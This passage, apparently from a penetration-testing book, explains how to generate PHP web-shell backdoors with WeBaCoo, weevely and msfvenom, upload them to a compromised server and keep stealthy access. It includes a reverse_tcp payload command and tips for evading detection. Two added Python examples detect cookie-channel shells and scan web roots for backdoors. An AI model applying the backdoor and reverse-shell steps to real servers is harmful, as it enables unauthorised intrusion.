Creating web backdoors
In this section, we will discuss several tools that can be used to create a web
backdoor. The tools in this category are usually used to maintain access to a
compromised web server.
You need to be aware that the backdoors discussed here might be detected by IDS,
antivirus, or other security tools. To create a stealthier backdoor, you may need to
customize the generated code.
To illustrate the scenario in this section, we will use the following IP addresses:
• 192.168.2.22 is the IP address of the attacker machine.
• 192.168.2.23 is the IP address of the target server.
Let's start with the WeBaCoo backdoor.
WeBaCoo
WeBaCoo (Web Backdoor Cookie) is a web backdoor script tool used to provide a
stealth terminal-like connection via HTTP between the client and web server.
WeBaCoo has two operation modes:
• Generation (option -g): In this mode, users can generate the backdoor code
containing PHP payloads
• Terminal (option -t): In this mode, users can connect to the backdoor on the
compromised server
The most interesting feature of WeBaCoo is that the communication between the web
server and client is encoded in the HTTP header cookie, so it might not be detected
by antivirus, network intrusion detection/prevention systems, network firewalls,
and application firewalls.
The following are the three most important values in the HTTP cookie field:
• cm: The shell command encoded in Base64
• cn: The new cookie name that the server will use to send the encoded output
• cp: The delimiter used to wrap the encoded output
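Because the page describes the three cookie fields precisely, a defender can write a detector for this channel. The following is an added example, not code from the book or from WeBaCoo: it parses a raw HTTP request, flags a Cookie header that carries the cm/cn/cp triple, decodes cm to show the command, and then recovers the command output from the Set-Cookie named by cn in the reply. The sample request and response are constructed for this example, and the assumption that the reply value is laid out as `<cp><Base64 output><cp>` is taken from the text's description of cp, not from the tool's source.

```python
import base64
import binascii

# Cookie names the text attributes to WeBaCoo: cm carries the Base64 command,
# cn names the cookie the server answers in, cp is the delimiter around the output.
WEBACOO_COOKIES = ("cm", "cn", "cp")


def parse_cookies(header_value):
    """Split a Cookie or Set-Cookie header value into a name -> value dict."""
    cookies = {}
    for part in header_value.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name.strip()] = value.strip()
    return cookies


def get_header(raw_http, name):
    """Return the value of the first header called `name` (case-insensitive)."""
    head = raw_http.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request/status line
        if ":" in line:
            key, value = line.split(":", 1)
            if key.strip().lower() == name.lower():
                return value.strip()
    return None


def safe_b64decode(value):
    """Decode strict Base64 to text, or return None if the value is not Base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_request(raw_request):
    """Return the decoded command and reply parameters when the request carries
    the cm/cn/cp cookie triple, otherwise None."""
    cookie_header = get_header(raw_request, "Cookie")
    if cookie_header is None:
        return None
    jar = parse_cookies(cookie_header)
    if not all(name in jar for name in WEBACOO_COOKIES):
        return None
    return {
        "command": safe_b64decode(jar["cm"]),
        "reply_cookie": jar["cn"],
        "delimiter": jar["cp"],
    }


def inspect_response(raw_response, reply_cookie, delimiter):
    """Recover the command output from the Set-Cookie named by cn.
    Assumption for this example: the value is <cp><Base64 output><cp>."""
    set_cookie = get_header(raw_response, "Set-Cookie")
    if set_cookie is None:
        return None
    value = parse_cookies(set_cookie).get(reply_cookie)
    if value is None:
        return None
    if (delimiter and value.startswith(delimiter) and value.endswith(delimiter)
            and len(value) > 2 * len(delimiter)):
        value = value[len(delimiter):-len(delimiter)]
    return safe_b64decode(value)


# Constructed sample traffic for this example (not a real capture).
# "d2hvYW1p" is Base64 for "whoami"; "d3d3LWRhdGE=" is Base64 for "www-data".
SAMPLE_REQUEST = (
    "GET /test.php HTTP/1.1\r\n"
    "Host: 192.168.2.23\r\n"
    "Cookie: cm=d2hvYW1p; cn=RrRRrr; cp=XXX\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: RrRRrr=XXXd3d3LWRhdGE=XXX; Path=/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 192.168.2.23\r\n"
    "Cookie: PHPSESSID=abc123; lang=en\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print("benign request flagged:", inspect_request(BENIGN_REQUEST) is not None)
    hit = inspect_request(SAMPLE_REQUEST)
    print("suspicious request:", hit)
    print("decoded reply:", inspect_response(SAMPLE_RESPONSE, hit["reply_cookie"], hit["delimiter"]))
```

The same idea (cookie values that decode as strict Base64 into shell-command text, or a reply cookie whose name was chosen by the previous request) is a useful generic signal for other cookie-channel shells, since antivirus and network IDS signatures rarely look inside cookie values.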
To start WeBaCoo, use the console to execute the following command:
# webacoo -h
This will display the command syntax on your screen. Let's see how to generate the
backdoor first.
The following are the command-line options related to the generation mode:
No. Option Description
1 -g Generates the backdoor code
2 -f function PHP system function used in the backdoor; one of system (default), shell_exec, exec, passthru, or popen
3 -o output The generated backdoor will be saved in the output file
To generate the obfuscated PHP backdoor using default settings and to save the
result in the test.php file, you can use the following command:
# webacoo -g -o test.php
The result is as follows:
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }
[+] Backdoor file "test.php" created.
Maintaining Access
The following is the content of the test.php file:
Then, upload this file to the compromised server (192.168.2.23).
The next action is to connect to the backdoor using the following command:
# webacoo -t -u http://192.168.2.23/test.php
The following is the backdoor shell:
The following is the HTTP request as captured by a web proxy:
The following is the web server response:
From the preceding HTTP request and response screenshots, we notice that the
communication between the backdoor and WeBaCoo is stealthy, so the victim might
not detect it.
To quit from the terminal mode, just type exit.
weevely
weevely is a stealth PHP web shell that provides an SSH-like console to execute
system commands and automate administration and post-exploitation tasks.
The following are the main features of weevely (https://github.com/epinna/Weevely):
• It has more than 30 modules to automate administration and post-exploitation
tasks such as:
° Execute commands and browse remote filesystems
° Check common server misconfiguration
° Spawn reverse and direct TCP shells
° Proxy HTTP traffic through target machines
° Run port scans from target machines
• Backdoor communications are hidden in the HTTP cookies
• It supports passwords to access the backdoor
To start weevely, use the console to execute the following command:
# weevely
This will display the command syntax on your screen.
weevely can be used to generate the following:
• Obfuscated PHP backdoor
• Backdoor existing image and create the related .htaccess
• Backdoored .htaccess
To display the list of generators and modules available, you can use the help option:
# weevely help
To generate the obfuscated PHP backdoor and save the result in the display.php
file, you can use the following command:
# weevely generate password display.php
[generate.php] Backdoor file 'display.php' created with password 'password'
The following is the content of the display.php file:
Then, upload it to the target web server by using legitimate access or exploiting web
application bugs.
To access the web backdoor shell on the target web server (192.168.2.23), you can
use the following command:
# weevely http://192.168.2.23/display.php password
If successful, you will see the weevely shell. To verify that we have connected to the
target machine, we issued the net.ifaces command to get the network interfaces
information from the remote machine. We also used the id command to get the ID of
the user. The output can be seen in the following screenshot:
From the preceding screenshot, we know that we have connected to the remote
machine. You can then issue other commands to the remote machine. You can issue
:help to see the available weevely commands:
For example, to run a simple port scan (using the :net.scan module) against the
target web server on port 22, we give the following command:
msfadmin@:/var/www $ :net.scan 192.168.2.23 22
SCAN 192.168.2.23:22-22 OPEN: 192.168.2.23:22
To run a simple port scan (using the :net.scan module) on port 80, we give the
following command:
msfadmin@:/var/www $ :net.scan 192.168.2.23 80
SCAN 192.168.2.23:80-80 OPEN: 192.168.2.23:80
To exit from the weevely shell, just press Ctrl + C.
The web shell created using the tools in this category is only for the PHP
language. If you want to have a web shell for other languages, you can
check Laudanum (http://laudanum.inguardians.com/). Laudanum
provides functionality such as shell, DNS query, LDAP retrieval, and
others. It supports the ASP, ASPX, CFM, JSP, and PHP languages.
PHP meterpreter
Metasploit has a PHP meterpreter payload. With this module, you can create a PHP
webshell that has meterpreter capabilities. You can then upload the shell to the target
server using vulnerabilities such as command injection and file upload.
To create the PHP meterpreter, we can utilize msfvenom from Metasploit using the
following command:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.22 -f raw > php-meter.php
The description of the command is as follows:
• -p: Payload (php/meterpreter/reverse_tcp)
• -f: Output format (raw)
• LHOST: The attacking machine IP address
The generated PHP meterpreter will be stored in the php-meter.php file. The
following is a snippet of the php-meter.php file contents:
Before you send this backdoor to the target, you need to remove the comment mark
in the first line, as shown with the arrow in the preceding screenshot.
You also need to set up a handler for the PHP meterpreter. On your machine, start
the Metasploit console (msfconsole) and use the multi/handler exploit. Then, select the
php/meterpreter/reverse_tcp payload, the same payload we used when generating
the shell backdoor. Next, set the LHOST variable to your machine's IP address.
After that, use the exploit command to run the handler. The result of the
command is as follows:
After you store the shell on the target web server using web vulnerabilities such
as command injection, or execute the shell from your own server through a remote file
inclusion vulnerability, you can access the shell via a web browser.
In your machine, you will see the meterpreter session open:
After that, you can issue meterpreter commands such as sysinfo and getuid.
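All three tools in this section leave a PHP file (or, for weevely's image generator, an image plus a .htaccess) on the compromised server, so a defender's complement to the discussion above is a static triage of the web root. The following is an added example, not code from the book or from any of the tools: it scores PHP files on the execution functions listed in the WeBaCoo -f table, on obfuscation helpers, on dynamic `$var(...)` calls and on cookie reads, and it flags .htaccess files that route non-PHP extensions through the PHP engine. The .htaccess pattern is a general assumption about how image-backdoor shells are served, not quoted from weevely's generator; the sample files are constructed fixtures, and the suspicious one is deliberately incomplete.

```python
import os
import re
import tempfile

# Execution primitives a shell generator chooses from (the -f list in the WeBaCoo
# table, plus proc_open) and helpers typically wrapped around them.
EXEC_FUNCTIONS = ("system", "shell_exec", "exec", "passthru", "popen", "proc_open")
OBFUSCATION_HELPERS = ("eval", "base64_decode", "gzinflate", "str_rot13", "assert")

EXEC_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCTIONS) + r")\s*\(", re.I)
OBF_RE = re.compile(r"\b(" + "|".join(OBFUSCATION_HELPERS) + r")\s*\(", re.I)
# A function called through a variable, e.g. $f("..."), hides the callee from grep.
DYNAMIC_CALL_RE = re.compile(r"\$\w+\s*\(")
# AddType/AddHandler lines that hand some extension to a PHP handler (assumed
# image-backdoor mechanism, not quoted from weevely).
HTACCESS_RE = re.compile(r"^\s*(AddType|AddHandler)\s+\S*php\S*\s+(.*)$", re.I | re.M)


def score_php_source(source):
    """Return (score, reasons) for one PHP source string; higher is more suspicious."""
    reasons = []
    exec_hits = sorted({m.lower() for m in EXEC_RE.findall(source)})
    if exec_hits:
        reasons.append("calls command-execution function(s): " + ", ".join(exec_hits))
    obf_hits = sorted({m.lower() for m in OBF_RE.findall(source)})
    if obf_hits:
        reasons.append("uses obfuscation helper(s): " + ", ".join(obf_hits))
    if DYNAMIC_CALL_RE.search(source):
        reasons.append("calls a function through a variable")
    if "$_COOKIE" in source or "HTTP_COOKIE" in source:
        reasons.append("reads cookies (the channel used by WeBaCoo and weevely)")
    if any(len(line) > 500 for line in source.splitlines()):
        reasons.append("contains a line longer than 500 characters")
    return len(reasons), reasons


def check_htaccess(source):
    """Return reasons for a .htaccess that maps non-.php extensions to PHP."""
    reasons = []
    for match in HTACCESS_RE.finditer(source):
        exts = match.group(2).split()
        if any(not ext.lower().startswith(".php") for ext in exts):
            reasons.append(f"{match.group(1)} maps {' '.join(exts)} to the PHP handler")
    return reasons


def scan_webroot(root):
    """Walk a web root and return {relative_path: reasons} for suspicious files."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            if name == ".htaccess":
                reasons = check_htaccess(source)
            elif name.lower().endswith((".php", ".phtml", ".php5")):
                _, reasons = score_php_source(source)
            else:
                continue
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings


# Constructed fixtures for this example. test.php only carries the indicators
# and is intentionally not a working script.
SAMPLE_FILES = {
    "index.php": "<?php\necho 'Hello ' . htmlspecialchars($_GET['name'] ?? 'world');\n",
    "test.php": (
        "<?php\n/* constructed fixture with web-shell indicators, incomplete */\n"
        "$f = 'passthru';\n$payload = base64_decode($_COOKIE['cm']);\n$f( /* ... */ );\n"
    ),
    ".htaccess": "AddType application/x-httpd-php .jpg\n",
}


def demo():
    """Write the fixtures to a temporary web root, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_webroot(root)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Run it as `python3 scan_webroot.py` against the fixtures, or call `scan_webroot("/var/www")` on a real document root; a file such as the php-meter.php above would trip the long-line and obfuscation checks, while a legitimate CMS will also produce hits, so treat the score as a triage order rather than a verdict and compare against a known-good checksum list where one exists.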
Summary
In this chapter, we discussed the operating system backdoors such as cymothoa,
intersect, and metsvc, which can be used to maintain access on target machines.
Next, we discussed protocol tunneling tools that can wrap one network protocol to
another. The goal of this protocol tunneling is to bypass any mechanism enacted by
the target machine to limit our capability to connect to the outside world. The tools
in this category are dns2tcp, iodine, ncat, proxychains, ptunnel, socat, sslh,
and stunnel4.
At the end of this chapter, we briefly described the web backdoor tools. These tools
can be used to generate a webshell backdoor on the target machine, and we can then
connect to this backdoor.
In the next chapter, we will discuss documenting, reporting, and presenting the
vulnerabilities found to the relevant parties.